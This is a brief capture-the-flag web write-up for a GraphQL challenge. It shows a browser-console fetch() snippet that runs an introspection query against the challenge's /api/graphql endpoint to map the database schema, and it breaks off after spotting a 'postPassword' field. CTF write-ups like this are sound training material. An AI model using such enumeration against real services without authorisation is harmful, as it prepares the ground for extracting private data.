VSL CTF 2026 Web Writeups
mrGraph Goal Leveraging the GraphQL Injection to get the flag in the database. My Solution The new intern made a website, there must be vulnerability. Examining sources of available pages, we can find a route that we can take advantage of /api/graphql (visible in /users route). In order to know all the schemas existed in the database, run this in the Console tab of browser: fetch('/api/graphql', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ query: ` query { __schema { types { name fields { name } } } }`, }), }) .then(response => response.json()) .then(data => { console.log(JSON.stringify(data, null, 2)); }); Got a really suspicious postPassword field: ...